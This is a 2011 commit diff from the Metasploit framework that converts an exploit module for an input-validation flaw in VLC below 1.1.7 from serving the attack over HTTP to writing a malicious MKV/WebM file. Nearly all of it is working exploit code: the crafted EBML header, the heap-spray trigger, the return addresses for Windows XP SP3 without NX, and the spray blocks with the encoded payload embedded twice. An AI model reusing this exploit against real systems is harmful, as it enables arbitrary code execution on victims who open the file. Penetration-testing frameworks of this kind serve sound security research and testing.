convert VLC module to FileFormat, adjust spray

git-svn-id: file:///home/svn/framework3/trunk@11705 4d416f70-5f16-0410-b530-b9f4589650da
2011-02-03 18:16:40 +00:00 · 2011-02-03 18:16:40 +00:00 · e06d4d52fe
parent 2c2f9cd4dc
commit e06d4d52fe
1 changed files with 30 additions and 25 deletions
--- a/modules/exploits/windows/fileformat/vlc_webm.rb
+++ b/modules/exploits/windows/fileformat/vlc_webm.rb
@ -14,7 +14,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking

-	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::FILEFORMAT

 	def initialize(info = {})
 		super(update_info(info,
@ -23,6 +23,11 @@ class Metasploit3 < Msf::Exploit::Remote
 					This module exploits an input validation error in VideoLAN VLC
 				< 1.1.7.  By creating a malicious MKV or WebM file, a remote attacker
 				could execute arbitrary code.
+
+				NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to 
+				permanently enable NX support on machines that support it. As such,
+				This module will only work against systems that do not support NX or
+				are too old to have SetProcessDEPPolicy.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         => [ 'Dan Rosenberg' ],
@ -42,24 +47,23 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Windows XP SP3', { 'Ret' => 0x05050505 } ],
+					[ 'Windows XP SP3 (w/o NX)',
+						{
+							'Ret' => 0x04040404, # 0x6a954ff0,
+						}
+					],
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => 'Jan 31, 2011',
 			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ true, 'The file name.',  'msf.mkv']),
+			], self.class)
 	end

-	def autofilter
-		false
-	end
-
-	def check_dependencies
-		use_zlib
-	end
-
-	def on_request_uri(cli, request)
-
-		return if ((p = regenerate_payload(cli)) == nil)
+	def exploit

 		# EBML Header
 		file =  "\x1A\x45\xDF\xA3"	# EBML
@ -101,21 +105,22 @@ class Metasploit3 < Msf::Exploit::Remote
 		file << "\x01\xff\xff\xff"	# This triggers our heap spray...
 		file << [target.ret].pack('V')	# Object address

-		# Spray the heap
-		file << ([target.ret].pack('V') * 0xa0000)
-		file << payload.encoded
-		file << ([target.ret].pack('V') * 0xa0000)
-		file << payload.encoded
-		file << ([target.ret].pack('V') * 0xa0000)
-		file << payload.encoded
-		file << ([target.ret].pack('V') * 0xa0000)
-		file << payload.encoded
+		# Spray some data
+		#block = Rex::Text.pattern_create(0x100000 - payload.encoded.length)
+		#block = "A" * (0x100000 - payload.encoded.length)
+		block = ([target.ret].pack('V') * (0x200000))

-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+		2.times {
+			block[0, 4] = "\x90" * 4
+			block[4, 4] = "\x05" * 4
+			#block[5426, 4] = [0xdeadbeef].pack('V')
+			file << block
+			file << payload.encoded
+		}

-		send_response_html(cli, file, { 'Content-Type' => 'application/octet-stream' })
+		print_status("Creating '#{datastore['FILENAME']}' file ...")

-		handler(cli)
+		file_create(file)

 	end
 end